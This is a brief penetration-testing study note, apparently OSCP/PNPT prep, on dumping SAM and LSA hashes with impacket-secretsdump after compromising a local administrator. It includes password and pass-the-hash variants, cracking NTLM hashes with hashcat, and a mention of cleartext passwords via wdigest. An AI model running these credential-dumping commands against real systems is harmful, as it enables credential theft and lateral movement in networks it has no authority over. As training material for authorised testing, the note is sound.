// notes/ Active Directory
🏛️

Post Compromise Attacks Dumping And Cracking Hashes

After compromising a Local Administrator account, we can dump hashes from he SAM and LSA on the machine using secretsdump. This can be done using the accounts password or hash.

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_dumping-and-cracking-hashes

Dumping and Cracking Hashes

Overview

After compromising a Local Administrator account, we can dump hashes from he SAM and LSA on the machine using secretsdump. This can be done using the accounts password or hash.

We can then crack the hashes using hashcat

On older machines that have wdigest enabled, there is a possibility to view passwords in clear-text

Secretsdump

bash
$impacket-secretsdump PNPT.local/greg:'Password1'@192.168.1.130
bash
$imapcket-secretsdump administrator@192.168.1.130 -hashes 'aad3b435b51404eeaad3b435b51404ee:7facdc498ed1'
bash
$hashcat -m 1000 crackme.txt ~/rockyou.txt -O -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule